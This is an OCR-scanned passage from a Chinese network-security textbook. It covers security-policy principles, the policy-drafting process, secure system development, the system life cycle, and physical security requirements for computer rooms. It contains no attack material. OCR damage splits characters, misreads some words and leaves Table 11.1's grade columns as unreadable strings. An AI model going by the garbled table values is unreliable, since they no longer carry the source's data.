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(7) 通信 业务 流 填充 管理 。 其 主要 功能 是 维护 通信 业务 流 填 充 的 规则 ,如 预定 的 数据 
率 ; 制定 随机 数据 率 ; 指定 报 文 特性 ; 按时 间 改 变 这 些 规 定 。 

(8) 路 由 控制 管理 。 其 主要 功能 是 确定 按 特 定 准则 选择 被 认为 是 安全 可 靠 或 可 信任 的 
链 路 或 子 网 。 

(9) 公证 管理 。 其 主要 功能 是 分 配 有 关公 证 的 信息 ; 在 公证 方 与 通信 的 实体 之 间 使 用 
协议 ; 与 公证 方 进行 交互 。 


10.3 安全 策略 与 运行 生命 周期 


在 安全 系统 设计 阶段 ,在 硬件 ,软件 设计 的 同时 ,应 规划 处 系统 安全 策略 ; 在 工程 设计 
中 ,应 按照 安全 策略 的 要 求 确定 系统 的 安全 机 制 ; 在 系统 运行 中 ,应 强制 执行 安全 机 制 所 要 
求 的 各 项 安全 措施 ,并 对 其 进行 检查 、 评 估 , 不 断 补充 、 改 进 和 完善 。 

每 个 安全 系统 都 有 其 自身 的 生命 周期 , 随 着 时 间 推 移 , 当 新 的 安全 系统 需求 出 现时 , 原 
来 的 安全 系统 就 被 取代 。 


10.3.1 安全 策略 定义 


1. 安全 策略 的 内 涵 

安全 策略 的 制定 与 实施 对 组 织 的 安全 有 着 非常 重要 的 作用 。 安 全 策略 是 指 在 一 个 特定 
的 环境 里 ,为 保证 提供 一 定 级 别 的 安全 保护 所 必须 遵守 的 规则 。 安 全 策略 从 本 质 上 说 是 描 
述 组 织 具 有 哪些 重要 的 信息 资产 ,并 说 明 如 何 对 这 些 资产 进行 保护 的 一 个 计划 。 

制定 安全 策略 的 目的 是 对 组 织 成 员 阐 明 如 何 使 用 系统 资源 ,如 何 处 理 敏感 信息 ,如何 采 
用 安全 技术 产品 ,用 户 应 该 具有 什么 样 的 安全 意识 ,掌握 什么 样 的 技能 要 求 , 承 担 什么 样 的 
责任 等 。 

安全 策略 应 当 目的 明确 ,内 容 清楚 ,能 广泛 地 被 组 织 成 员 所 接受 与 遵守 ,要 求 有 足够 的 
灵活 性 和 适应 性 ,能 够 涵盖 各 种 数据 、 活 动 和 资源 。 

2. 安全 策略 制定 的 原则 

在 制定 信息 安全 管理 策略 时 ,要 严格 遵守 以 下 主要 原则 : 

(1) 目的 性 原则 。 安 全 策略 是 为 组 织 完成 自己 的 信息 安全 使 命 而 制定 的 ,策略 应 该 反 
映 组 织 的 整体 利益 和 可 持续 发 展 的 要 求 。 

(2) 适用 性 原则 。 安 全 策略 应 该 反映 组 织 的 真实 环境 和 信息 安全 的 发 展 水 平 。 

(3) 可 行 性 原则 。 安 全 策略 应 该 具有 切实 可 行 性 ,其 目标 应 该 可 以 实现 ,并 容易 测量 和 
审核 。 

(4) 经 济 性 原则 。 安 全 策略 应 该 经 济 合理 ,尽量 减少 规模 和 复杂 程度 。 

(5) 完整 性 原则 。 安 全 能 够 反映 组 织 的 所 有 业务 流程 的 安全 需要 。 

(6) 一 致 性 原则 。 安 全 策略 要 和 国家 、 地 方 的 法 律 法 规 保持 一 致 ， 和 组 织 已 有 的 策略 、 
方针 保持 一 致 ; 整体 安全 策略 保持 一 致 。 

(7) 弹性 原则 。 对 安全 需要 求 有 总 体 的 设计 和 长 远 的 规划 ,策略 不 仅 要 满足 当前 的 组 
织 要 求 , 还 要 满足 组 织 和 环境 在 未 来 一 段 时 间 内 发 展 的 要 求 。 


3. 安全 策略 的 内 容 

要 实现 网 络 安全 ,不 但 要 靠 先 进 的 技术 ,而 且 也 得 靠 严格 的 管理 法 律 约束 和 安全 教育 ， 
主要 包括 如 下 内 容 : 

(1) 先进 的 网 络 安全 技术 是 网 络 安全 的 根本 保证 。 对 网 络 面临 的 威胁 进行 风险 评估 ， 
决定 需要 的 安全 服务 ,选择 相应 的 安全 机 制 , 然 后 使 用 先进 的 安全 技术 ,形成 一 个 全 方位 的 
安全 系统 。 

(2) 严格 的 安全 管理 是 确保 安全 策略 落实 的 基础 。 应 建立 相应 的 网 络 安全 管理 办 法 ， 
加 强 内 部 管理 ,建立 合适 的 网 络 安全 管理 系统 ,加 强 用 户 管理 和 授权 管理 ,建立 安全 审计 和 
跟踪 体系 ,提高 整体 网 络 安全 意识 。 

(3) 严格 的 法 律 、 法 规 是 网 络 安全 保障 的 坚强 后 盾 。 面 对 日 趋 严 重 的 网 络 犯 罪 ,必须 建 
立 与 网 络 安 全 相关 的 法 律 、 法 规 ,使 攻击 者 慑 于 法 律 , 不 地 轻举妄动 。 

4. 安全 策略 的 制定 过 程 

1) 理解 组 织 业 务 特征 

设计 信息 安全 策略 的 前 提 是 充分 了 解 组 织 业务 特征 ,包括 对 其 业务 内 容 、 性 质 \ 目 标 及 
其 价值 进行 分 析 。 

2) 得 到 管理 层 的 明确 支持 

为 了 使 制定 的 信息 安全 策略 与 组 织 的 业务 目标 一 致 ,使 制定 的 安全 方针 \ 政 策 和 控制 措 
施 可 以 在 组 织 的 上 上 下 下 得 到 有 效 的 贯彻 ,可 以 得 到 有 效 的 资源 保证 ,安全 策略 制定 需要 得 
到 管理 层 的 明确 支持 。 

3) 组 建安 全 策略 制定 小 组 

安全 策略 制定 小 组 包括 : 高 级 管理 人 员 、 信 息 安 全 管理 员 、 信 息 安 全 技术 人 员 、 负 责 安 
全 策略 执行 的 管理 人 员 和 用 户 部 门人 员 。 

4) 确定 安全 整体 目标 

通过 防止 安全 事故 的 发 生 和 将 可 能 出 现 的 安全 事故 的 影响 降 到 最 低 , 保 证 业务 持续 性 ， 
使 业务 损失 最 小 化 ,并 为 业务 目标 的 实现 提供 保障 。 

5) 确定 安全 策略 范围 

根据 实际 情况 确定 信息 安全 策略 要 涉及 的 范围 ,可 以 在 整个 组 织 范 围 内 ,或 者 在 个 别 部 
门 或 领域 制定 信息 安全 策略 。 

6) 进行 风险 评估 与 选择 安全 控制 

选择 适合 组 织 安全 策略 的 基础 是 风险 评估 的 结果 ,组 织 选 择 出 了 适合 自己 安全 需求 的 
安全 控制 目标 与 安全 控制 方式 后 ,安全 策略 的 制定 才 有 了 最 直接 的 依据 。 

7) 起 草拟 定安 全 策略 

安全 策略 要 尽 可 能 地 涵盖 所 有 的 风险 和 控制 ,根据 具体 的 风险 和 控制 制订 相应 的 安全 
策略 。 

8) 评估 安全 策略 

安全 策略 制定 后 ,要 经 过 充分 的 评估 ,确保 安全 策略 能 够 达到 组 织 需要 的 安全 目标 。 评 
估 时 需要 考虑 以 下 方面 : 安全 策略 要 符合 法 律 法规、 技术 标准 及 合同 的 要 求 ; 安全 策略 已 
经 得 到 了 管理 层 批准 和 支持 ; 安全 策略 不 能 损害 组 织 、 组 织 人 员 及 第 三 方 的 利益 ; 安全 策 
略 实用 、 可 操作 并 可 以 在 组 织 中 全 面 实施 ; 安全 策略 能 够 满足 组 织 在 各 个 方面 的 安全 要 求 ; 
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安全 策略 得 到 了 组 织 中 的 人 员 与 相关 利益 方 的 同意 等 。 

9) 实施 安全 策略 

把 具体 安全 策略 编制 成 组 织 信息 安全 策略 手册 ,并 将 其 发 布 到 组 织 中 的 每 个 组 织 人 员 
与 相关 利益 方 。 

10) 持续 改进 安全 策略 

组 织 所 处 的 内 外 环境 在 不 断 变化 ,信息 资产 所 面临 的 风险 也 在 不 断 变化 ,人 的 思想 和 观 
念 也 在 不 断 的 变化 ,所 以 要 定期 评审 安全 策略 ,进行 持续 改进 。 


10.3.2 安全 系统 的 开发 与 运行 


系统 开发 是 创建 一 个 具有 特定 功能 和 性 能 的 系统 ,为 了 保证 整个 系统 的 安全 ,必须 保证 
系统 开发 过 程 的 安全 ,以 及 所 开发 系统 的 安全 。 

1. 安全 系统 的 开发 

安全 系统 开发 应 该 遵循 的 原则 有 : 主管 参与 优化 与 创新 .充分 利用 信息 资源 .实用 和 
时 效 ,规范 化 .有效 安全 控制 以 及 适应 发 展 变化 。 

安全 系统 开发 需要 进行 安全 控制 有 : 

1) 可 行 性 评估 

可 行 性 评估 是 对 系统 开发 实施 安全 管理 必须 遵循 的 最 基本 条 件 。 可 行 性 评估 指 评估 在 
当前 环境 下 系统 开发 必须 具备 的 资源 和 条 件 。 包 括 目标 和 方案 的 可 行 性 、 实 现 技 术 方 面 的 
可 行 性 ,社会 及 经 济 可 行 性 和 操作 和 进度 可 行 性 。 

2) 项 目 管理 

项 目 管理 是 在 项 目 实施 过 程 中 对 其 计划 ,组织 、 人 员 及 相关 数据 进行 管理 和 配置 ,对 项 
目 实施 状态 进行 监视 和 对 项 目 完 成 情况 进行 反馈 。 

3) 代码 审查 

防止 系统 中 的 各 种 错误 和 漏洞 的 最 好 方法 是 进行 代码 审查 。 代 码 审 查 主 要 任务 是 发 现 
程序 的 实现 与 设计 文档 不 一 致 的 地 方 和 程序 中 的 逻辑 错误 。 开 发 小 组 的 各 个 成 员 要 互相 进 
行 代码 审查 ,保证 代码 的 正确 是 开发 小 组 程序 员 的 共同 责任 。 

4) 程序 测试 

程序 测试 的 目的 有 两 个 : 一 个 是 确定 程序 的 正确 性 , 另 一 个 是 排除 程序 中 的 安全 隐患 。 
程序 测试 是 使 得 安全 系统 成 为 可 用 产品 的 重要 措施 。 

5) 版 本 管理 

版 本 管理 是 提高 系统 可 靠 性 的 重要 措施 。 安 全 系统 的 设计 过 程 是 由 一 个 状态 向 另 一 个 
状态 转变 的 过 程 ,系统 的 版 本 反映 设计 过 程 的 相应 变迁 。 设 计 者 在 开发 环境 中 正在 进行 设 
计 开 发 ,对 应 的 版 本 是 工作 版 本 ,这 个 版 本 是 不 能 使 用 的 或 没有 配置 好 的 版 本 。 当 设计 已 经 
完成 ,系统 进行 审批 ,对 应 的 版 本 是 提交 版 本 ,这 个 版 本 不 允许 删除 和 更 新 。 如 果 提 交 版 本 
通过 所 有 的 检测 测试 .审核 和 验收 后 ,那么 就 升级 为 发 放 范本 ,这 个 版 本 不 能 修改 ,而 且 应 
该 归档 存放 。 如 果 系 统 设计 达到 了 某 种 要 求 ,那么 在 一 段 时 间 内 保持 不 变 的 版 本 就 称 为 冻 
结 版 本 。 

2. 安全 系统 的 运行 

加 强 对 系统 运行 的 安全 管理 可 以 保证 安全 系统 的 可 靠 性 ,安全 性 和 有 效 性 。 系 统 运行 


安全 管理 包括 系统 评价 .系统 运行 安全 检查 和 系统 变更 管理 等 ,还 应 该 建立 系统 运行 文档 。 

1) 系统 评价 

安全 系统 投入 运行 后 ,要 不 断 对 其 运行 状况 进行 评价 ,并 将 评价 结果 作为 系统 维护 .更 
新 和 进一步 开发 的 依据 。 系 统 评价 是 对 一 个 系统 进行 质量 检测 分 析 , 包 括 以 下 方面 : 系统 
对 用 户 和 业务 需求 的 相对 满意 程度 ; 系统 开发 过 程 的 规范 程度 ; 系统 功能 的 先进 性 、 可 靠 
性 ,完备 性 和 发 展 性 ; 系统 的 性 能 、 成 本 、 效 益 综 合 比 ; 系统 运行 结果 的 有 效 性 、 可 行 性 和 完 
整 性 。 

系统 评价 的 指标 有 预定 的 系统 开发 目标 完成 情况 .系统 运行 实用 性 评价 和 系统 对 设备 
的 影响 。 

2) 系统 运行 安全 检查 

系统 运行 检查 就 是 要 确保 系统 正常 运行 并 处 于 稳定 高 效 的 运行 状态 。 系 统 运 行 安全 检 
查 包 括 以 下 两 个 方面 : 进行 计算 机 硬件 系统 、 实 体 环境 和 人 员 的 安全 检查 ; 进行 系统 运行 
的 安全 测试 。 

3) 系统 变更 管理 

安全 系统 总 是 处 于 一 种 不 断 变化 的 状态 ,系统 变更 管理 的 目的 是 迅速 解决 由 于 安全 系 
统 不 断 变化 产生 的 问题 。 系 统 变更 管理 包括 : 对 系统 进行 运行 同步 跟踪 ,对 系统 软件 的 补 
充 、 升 级 和 修订 ,对 硬件 和 物理 设备 的 变更 。 

4) 系统 运行 文档 的 建立 

将 系统 初始 状态 、 当 前 状态 和 各 类 程序 运行 参数 等 系统 设置 进行 安全 备份 ,建立 系统 设 
置 参 数 文件 ,用 于 系统 运行 维护 、 系 统 恢复 和 系统 移植 ,也 可 用 于 安全 审查 。 将 系统 运行 时 
产生 的 特定 事件 记录 在 系统 运行 日 志 中 ,用 于 提供 系统 权限 检查 中 的 问题 、 系 统 故 障 的 发 生 
与 恢复 以 及 系统 检测 等 信息 ,也 可 用 于 检查 系统 的 使 用 情况 。 


10.3.3 安全 系统 的 生命 周期 


一 个 安全 系统 使 用 了 一 段 时间 以 后 .会 由 于 生产 生活 的 发 展 而 变 得 不 合 时 家 ,用户 提 出 
新 的 安全 系统 的 要 求 ,新 的 安全 系统 代替 旧 的 安全 系统 的 这 种 周期 循环 就 称 为 安全 系统 的 
生命 周期 。 安 全 系统 的 生命 周期 由 系统 规划 、 系 统 分 析 、 系 统 设计 、 系 统 实施 、 维 护 管理 5 个 
阶段 组 成 ,如 图 10.7 所 示 。 

1. 系统 规划 阶段 

用 户 提出 建立 新 的 安全 系统 或 者 改造 原 有 安全 系统 的 要 求 ,进行 初步 调查 研究 ,给 出 建 
设 性 结论 ,经 过 专家 组 讨论 研究 后 形成 可 行 性 研究 报告 ,将 新 系统 建立 方案 和 实施 计划 编写 
成 系统 设计 任务 书 ,作为 以 后 各 个 设计 阶段 的 指导 性 文件 。 

2. 系统 分 析 阶 段 

根据 系统 设计 任务 书 所 规定 的 范围 进行 详细 调查 、 收 集 信 息 、 分 析 数 据 ,构造 出 新 系统 
的 逻辑 模型 ,确定 系统 工作 流程 ,形成 系统 方案 ,并 将 系统 分 析 的 结果 编写 成 逻辑 说 明 书 。 

3. 系统 设计 阶段 

根据 系统 分 析 阶 段 提 出 的 逻辑 模型 进行 物理 模型 的 设计 ,确定 系统 的 实施 方案 。 系 统 
设计 时 先进 行 总 体 设计 ,之 后 进行 详细 设计 。 主 要 设计 包括 安全 机 制 的 选择 和 设计 密码 体 
制 工程 化 设计 、 密 钥 管 理 措施 设计 、 系 统 硬件 和 软件 的 选择 等 。 系 统 设计 的 结果 总 结 成 系统 
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10.7 安全 系统 的 生命 周期 


的 详细 技术 设计 报告 。 

4. 系统 实施 阶段 

该 阶段 是 对 新 系统 进行 实施 ,主要 包括 应 用 程序 的 编制 与 调试 、 人 员 培 训 、 系 统 转换 和 
系统 验收 等 。 

5. 维护 管理 阶段 

系统 投入 运行 后 ,需要 不 断 地 维护 和 管理 ,根据 用 户 提出 的 安全 需求 修改 系统 功能 或 增 
加 系统 功能 。 安 全 系统 运行 一 段 时 间 以 后 ,还 要 对 系统 工作 质量 、 经 济 效益 进行 评价 ,作为 
新 系统 开发 的 需求 和 依据 。 

安全 系统 的 开发 过 程 是 一 个 从 抽象 到 具体 的 逐步 细 化 的 过 程 。 在 这 个 过 程 中 ,每 个 阶 
段 都 可 能 需要 反复 多 次 ,不 断 优化 。 


10.4 小 结 
本 章 是 计算 机 网 络 安 全 体系 结构 的 阐述 。 主 要 介绍 了 计算 机 网 络 的 两 种 安全 模型 、 网 
络 安全 体系 结构 框架 .安全 策略 和 安全 系统 的 生命 周期 。 
读者 要 掌握 基本 概念 ,对 网 络 安全 体系 结构 有 个 整体 概念 。 


10.5 习 题 


1. 计算 机 网 络 安全 的 模型 有 哪些 ? 
2. 简 述 Internet 网 络 安全 体系 结构 框架 。 


3. 图 10. 8 表示 的 是 P2DR2 动态 安全 模型 ,请 从 信息 安全 角度 分 析 此 模型 。 


7 
响应 (R) 


策略 (P) 


10.8 ”P2DR2 模型 


Li 
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唯一 真正 安全 的 系统 是 断 电 后 被 浇铸 进 水 泥 块 中 并 被 封存 进 防 辐射 的 有 重兵 把 守 
的 屋子 内 的 系统 。 
一 一 Gene Spafford 


确保 整个 计算 机 网 络 系统 的 安全 前 提 , 是 确保 计算 机 以 及 网 络 系统 机 房 的 物理 安全 。 
只 有 物理 安全 得 到 了 保证 ,整个 计算 机 网 络 系统 的 安全 才 有 可 能 实现 。 

网 络 实体 安全 (Physical Security) 又 叫 物 理 安全 ,是 指 为 了 保证 网 络 系统 安全 可 靠 地 运 
行 ,确保 系统 在 对 信息 进行 存储 和 传输 的 过 程 中 ,不 会 受到 人 为 或 自然 因素 的 危害 ,对 网 络 
机 房 、 系 统 环境 、 系 统 设备 以 及 存储 介质 等 所 进行 的 安全 管理 。 实 体 安全 的 目的 是 保护 计算 
机 、 网 络 服 务 器 、 交 换 机 、 路 由 器 防火 墙 等 硬件 实体 免 受 自然 灾害 、 人 为 失误 、 犯 罪行 为 的 破 
坏 , 确 保 系 统 有 一 个 良好 的 工作 环境 等 。 

影响 计算 机 网 络 实体 安全 的 主要 因素 有 : 计算 机 及 其 网 络 系统 自身 存在 的 脆弱 性 因 
素 ; 各 种 自然 灾害 导致 的 安全 问题 ; 由 于 人 为 的 失误 及 各 种 犯罪 行为 导致 的 安全 问题 。 

实体 安全 包括 环境 安全 ,设备 安全 ,存储 媒体 安全 和 硬件 防护 。 

1. 环境 安全 

计算 机 网 络 通信 系统 的 运行 环境 应 按照 国家 有 关 标 准 设计 实施 ,应 具备 消防 报警 .照明 
安全 、 不 间断 供电 、 温 湿度 控制 系统 和 防盗 报警 ,以 保护 系统 免 受 水 . 火 有 害 气体 ,地震 、 静 
电 的 危害 。 

2. 设备 安全 

通信 设备 和 通信 线路 的 装置 安装 要 稳固 牢靠 ,具有 一 定 对 抗 自然 因素 和 人 为 因素 破坏 
的 能 力 。 同 时 设备 应 该 能 够 防止 电磁 信息 的 泄漏 .线路 截获 ,以 及 抗 电磁 干扰 。 

3. 存储 介质 安全 

存储 介质 的 安全 包含 两 方面 的 内 容 : 一 方面 是 存储 介质 自身 的 安全 , 另 一 方面 是 存储 
介质 上 数据 的 安全 。 存 储 介质 本 身 的 安全 主要 是 安全 保管 .防盗 、 防 毁 和 防老 ; 其 上 的 数据 
安全 是 指 防 止 数据 被 非法 复制 和 非法 销毁 。 

4. 安全 管理 

安全 管理 包括 硬件 资源 的 安全 管理 ,信息 资源 的 安全 与 管理 健全 管理 机 构 和 规章 制度 
等 内 容 。 


11.1 计算 机 网 络 机 房 与 环境 安全 


计算 机 网 络 机 房 与 环境 安全 就 是 要 保证 网 络 系统 有 一 个 安全 的 物理 环境 ,对 放置 网 络 
系统 的 空间 进行 周密 规划 ,充分 考虑 各 种 因素 对 信息 系统 造成 的 威胁 并 加 以 规避 。 

1. 机 房 设计 依据 的 规范 标准 

(1)《 电 子 计算 机 机 房 设 计 规 范 》(GB50174 一 93) 。 

(2)《 电 子 计算 机 场地 通用 规范 》(GB/T2887 一 2000) 。 

(3)《 计 算 机 机 房 用 活动 地 板 的 技术 条 件 》(GB6650 一 86) 。 

(4)《 计 算 站 场地 安全 要 求 )(GB9361 一 88)。 

(5)《 电 子 计算 机 机 房 施工 及 验收 规范 》(SJ/T3003 一 93)。 

(6)《 供 配 电 系统 设计 规范 》(GB50052 一 95) 。 

(7)《 低 压 配 电 设计 规范 》(GB50054 一 95) 。 

(8)《 建 筑 设 计 防 火 规 范 》(GB50016 一 2006) 。 

(9)《 建 筑 物 防 雷 设计 规范 》(GB50057 一 94) 。 

(10)《 采 上 暖 通风 与 空气 调节 设计 规范 》(GB50019 一 2003)。 

(11)《 建 筑 与 建筑 群 综合 布线 系统 工程 设计 规范 》(GB/T50311 一 2007)。 

2. 机 房 设 计 遵 循 的 原则 

(1) 先进 性 原则 。 采 用 先进 成 熟 的 技术 和 设备 , 既 要 满足 当前 需求 ,又 要 兼顾 未 来 扩展 
的 要 求 , 尽 可 能 采用 最 先进 的 技术 .设备 和 材料 ,以 适应 高 速 的 数据 传输 需要 ,使 整个 系统 在 
一 段 时 期 内 保持 技术 的 先进 性 ,并 具有 良好 的 发 展 潜力 ,以 适应 未 来 业务 发 展 和 技术 升级 的 
需要 。 

(2) 可 管理 性 原则 。 在 机 房 设 计时 ,必须 建立 一 套 全 面 、 完 善 的 机 房管 理 和 监控 系统 。 
所 选用 的 设备 应 具有 智能 化 ,可 管理 的 功能 ,同时 采用 先进 的 管理 监控 系统 设备 及 软件 , 监 
测 整 个 计算 机 机 房 的 运行 状况 ,故障 发 生 时 迅速 确定 位 置 和 原因 ,提高 运行 性 能 ,可 靠 性 , 简 
化 机 房管 理 人 员 的 维护 工作 。 

(3) 可 靠 性 原则 。 为 保证 各 项 业务 应 用 ,机 房 布 局 结构 设计 、 设 备 选 型 .日 常 维护 等 各 
个 方面 必须 进行 高 可 靠 性 的 设计 和 建设 。 在 关键 设备 采用 硬件 备份 . 宛 余 等 可 靠 性 技术 的 
基础 上 ,采用 相关 的 软件 技术 措施 提高 计算 机 机 房 的 安全 可 靠 性 。 


11.1.1 机 房 的 安全 等 级 


为 了 对 网 络 系统 提供 足够 的 保护 而 又 节约 资源 ,应 该 对 网 络 机 房 规 定 不 同 的 安全 等 级 ， 
不 同等 级 的 机 房 提 供 不 同 的 安全 保护 。 根 据 GB/T 9361 一 1988 标准 《计算 机 场地 安全 要 
求 ), 机 房 的 安全 等 级 分 为 3 个 基本 类 别 。 

1. A 类 

对 计算 机 机 房 的 安全 有 严格 的 要 求 . 有 完善 的 计算 机 机 房 安全 措施 。 该 类 机 房 可 以 防 
止 需要 最 高 安全 性 和 可 靠 性 的 系统 和 设备 。 

2. B 类 

对 计算 机 机 房 的 安全 有 和 较 严 格 的 要 求 ,有 较 完善 的 计算 机 机 房 安 全 措施 。 该 类 机 房 的 
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安全 性 较 A 类 次 之 ,但 比 C 类 强 。 

3. C 类 

对 计算 机 机 房 的 安全 有 基本 的 要 求 ,有 基本 的 计算 机 机 房 安 全 措施 。 该 类 机 房 可 以 存 
放 只 需要 最 低 限度 的 安全 性 和 可 靠 性 的 一 般 性 系统 。 

其 中 A 类 安全 级 别 最 高 ,B 类 安全 级 别 其 次 ,C 类 安全 级 别 最 低 。 不 同安 全 等 级 机 房 的 
安全 要 求 如 表 11. 1 所 示 。 


表 11.1 机 房 安 全 级 别 要 求 


项 目 
场地 选 址 
结构 防火 
火灾 自动 报警 系统 
自动 灭火 系统 
灭火 器 
内 部 装饰 
供 配 电 系统 
空气 调节 系统 
防水 
防 静电 
防 雷 击 
防 电磁 干扰 
防 噪声 
防 鼠 害 
入 侵 报警 系统 
视频 监控 系统 
出 入 口 控制 系统 
集中 监控 系统 
注 ; 〇 :表示 要 求 并 可 有 附加 要 求 ; 口 : 表示 要 求 ; A :表示 无 要 求 。 


DODDOGDOOOOOCOODGO0O 所 
性 口 必 必 口 口 口 口 口 口 口 口 口 口 口 口 口 口 | 站 


PppPpCP 


11.1.2 机 房 的 安全 保护 


计算 机 机 房 的 安全 是 计算 机 网 络 实体 安全 的 一 个 重要 部 分 ,机 房 应 该 符合 国家 标准 和 
有 关 规 定 , 比 如 GB/T 9361 一 1988 标准 (计算 机 场地 安全 要 求 》。 

1. 机 房 位 置 选择 

计算 机 网 络 机 房 应 避免 靠近 公共 区 域 , 避 免 窗户 直接 临街 。 在 一 个 高 大 的 建筑 内 ,计算 
机 房 最 好 不 要 建 在 潮湿 的 底层 ,也 尽量 避免 建 在 可 能 漏 雨 的 顶层 ,一 般 放 置 在 第 二 、 三 层 较 
宜 。 在 有 多 个 办 公 室 的 楼 层 内 ,计算 机 机 房 应 至 少 占据 半 层 ,或 靠近 一 边 。 这 样 既 便于 防 
护 , 又 利于 发 生 危 险 时 的 撤离 。 

(1) 保证 机 房 所 在 楼 层 水 、 电 充足 ,自然 环境 清洁 。 

(2) 保证 机 房 的 设备 进出 口 畅通 ,应 有 足够 大 型 设备 出 和 人 的 出 入 口 。 

(3) 保证 机 房 设备 有 扩充 空间 的 余地 ,电力 系统 、 空 调 设备 等 所 占 空间 也 要 预 留 未 来 若 
干 年 内 扩充 的 需求 。 


(4) 机 房 严 禁 靠近 水 源 ,或 墙壁 内 部 有 水 源 管 路 经 过 机 房 项 部 及 底部 ,使 用 独立 的 消防 

(5) 机 房 周围 100m 内 不 能 有 人 危险 建筑 物 。 和 危险 建筑 物 指 易 燃 、 易 爆 、 有 害 气体 等 存放 
场所 ,如 加 油 站 、 煤 气 站 、 天 然 气 煤气 管道 和 散发 有 强烈 腐蚀 气体 的 设施 、 工 厂 等 。 

(6) 远离 强 震 源 和 强 噪声 源 , 避 开 强 电磁 场 干 扰 。 

2. 机 房 建 筑 和 结构 的 安全 

(1) 电梯 和 楼 梯 不 能 直接 进入 机 房 。 

(2) 建筑 物 周围 应 有 足够 亮度 的 照明 设施 和 防止 非法 进入 的 设施 。 

(3) 外 部 容易 接近 的 进出 口 , 如 风 道 口 、 排 风口 、 窗 户 、 应 急 门 等 应 有 栅栏 或 监控 措施 ， 
而 周边 应 有 物理 屏障 ( 隔 墙 .带刺 铁丝 网 等 ) 和 监视 报警 系统 ,窗口 应 采取 防范 措施 ,必要 时 
安装 自动 报警 设备 。 

(4) 机 房 进 出 口 须 设置 应 急电 话 。 

(5) 机 房 供电 系统 应 将 动力 照明 用 电 与 计算 机 系统 供电 线路 分 开 , 机 房 及 玻 散 通道 应 
配备 应 急 照 明 装 置 。 

(6) 机 房 应 远离 产生 粉尘 、 油 烟 有 害 气体 ,远离 易 燃 物 、 易 爆 物 和 腐蚀 性 物品 。 

(7) 进出 机 房 时 要 更 衣 , 换 鞋 ,机 房 的 门窗 在 建造 时 应 考虑 封闭 性 能 。 

(8) 照明 应 达到 规定 标准 。 

计算 机 网 络 机 房 应 减少 无 关 人 员 进 入 机 房 的 机 会 。 所 有 进出 计算 机 房 的 人 都 必须 通过 
管理 人 员 控 制 的 地 点 。 访 问 人 员 一 般 不 进入 数据 区 或 机 房 ,特殊 需要 进入 控制 区 的 ,应 办 理 
手续 。 每 个 访问 者 和 带 和 人 、 带 出 的 物品 都 应 接受 检查 。 


11.1.3 机 房 的 三 度 要 求 


机 房 的 三 度 要求 是 : 温度 、 湿 度 和 洁净 度 。 为 了 使 系统 正常 工作 ,机 房 的 三 度 要 求 必须 
得 到 保证 。 

1. 温度 

在 机 房 内 ,温度 会 随 着 热量 的 增加 而 升 高 。 热 量 主要 来 自 于 计算 机 的 散热 ,计算 机 在 运 
行 期 间 产生 的 热量 最 大 ; 其 次 还 来 自 于 太阳 的 辐射 ,人工 照 明 、 人 体 体 热 及 机 房 内 的 其 他 设 
备 的 散热 。 

机 房 的 温度 过 高 或 过 低 都 会 对 网 络 硬 件 造成 一 定 的 损坏 。 温 度 过 低 会 导致 硬盘 无 法 启 
动 , 过 高 会 使 元 器 件 性 能 发 生变 化 , 耐 压 降低 ,导致 不 能 工作 。 

一 般 要 求 A 级 机 房 在 开机 时 温度 : 夏季 21C ~25C ; 冬季 18C 一 22"C , 详 见 表 11. 2。 

需要 注意 的 是 ,机 房 温度 标准 设 定 并 非 越 高 越 好 ,过 高 的 标准 会 造成 有 限 资源 和 资金 的 浪 
费 。 各 类 机 房 环 境 温 度 应 根据 机 房 设 备 的 特性 与 要 求 来 设 定 , 以 求 取得 最 佳 效 果 与 经 济 效益 。 

为 控制 机 房 的 温度 保持 在 所 要 求 的 限度 内 ,机 房 要 求 安装 空调 系统 。 有 条 件 的 机 房 可 
安装 温度 采集 器 ,并 采用 温度 自动 报警 装置 来 监测 温度 的 变化 ,从 而 防止 温度 超过 某 一 指标 
或 低 于 某 一 指标 。 

2. 湿度 

同样 ,机 房 的 湿度 过 高 或 过 低 也 会 对 网 络 硬件 有 一 定 影响 。 相 对 湿度 过 高 会 使 电气 部 
分 绝缘 性 降低 ,会 加 速 金属 器 件 的 腐蚀 ,引起 绝缘 性 能 下 降 ,灰尘 的 导电 性 能 增强 ,器件 失效 
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的 可 能 性 增 大 ; 而 相对 湿度 过 低 、. 过 于 干燥 可 能 导致 计算 机 中 某 些 器 件 龟 裂 ,印刷 电路 板 变 
形 , 特 别 是 静电 感应 增加 ,使 计算 机 内 信息 丢失 、 损 坏 芯片 ,对 计算 机 带 来 严重 危害 。 
一 般 要 求 A 级 机 房 在 开机 时 相对 湿度 控制 在 45% 一 65% 为 宜 。 详 细 情 况 见 表 11. 2。 
防止 机 房 内 过 湿 过 干 的 有 效 措施 是 把 握 好 室内 温度 ,控制 湿度 主要 是 通过 控制 温度 来 
实现 。 对 室内 相对 湿度 要 求 严 格 的 机 房 ,可 使 用 空气 除湿 器 等 设备 作为 专用 控制 湿度 设备 。 
停机 时 机 房 内 的 温度 和 适度 同样 也 有 一 定 的 要 求 ,详细 情况 见 表 11. 3。 


表 11.2 开机 时 机 房 内 的 温度 和 湿度 要 求 


A 级 
项 目 也 级 
夏季 冬季 
温度 CC) 23 土 2 20 士 2 15 一 30 
相对 湿度 (%) 45 一 65 40 一 70 
温度 变化 率 CC/h) 二 5 并 不 得 结 露 < 王 10 并 不 得 结 露 


表 11.3 停机 时 机 房 内 的 温度 和 适度 要 求 


项 目 A 级 B 级 
温度 CC) 6 一 35 6 一 35 
相对 湿度 (%) 40~70 20~80 
温度 变化 率 CC/h) 一 5 并 不 得 结 露 二 10 并 不 得 结 露 


温度 与 湿度 控制 最 好 都 与 空调 联系 在 一 起 ,由 空调 系统 集中 控制 。 机 房 内 应 安装 温 、 湿 
度 显 示 仪 ,随时 观察 、 监 测 。 
3. 洁净 度 
尘埃 的 成 分 包括 : 漂浮 状 尘 埃 、 虫 体 及 其 排泄 物 、 纤 维 、 病 菌 、 化 学 烟雾 等 ,它们 时 常 漂 
浮 在 室内 空气 中 并 被 大 量 吸入 或 附着 在 物体 表面 。 
机 房 内 部 人 员 集 中 活动 .设备 集中 运行 ,无 论 采用 何 种 建筑 结构 ,其 尘埃 都 是 无 法 避免 
的 。 如 果 平 时 不 注意 计算 机 的 保养 ,到 一 定时 间 后 ,机 箱 内 会 积 满 尘埃 。 这 主要 是 由 于 计算 
机 在 运行 的 过 程 中 会 产生 很 多 的 热量 ,而 计算 机 散热 都 是 采用 风 冷 方式 ,这 样 空气 中 的 尘埃 
就 乘虚 而 人 了 。 
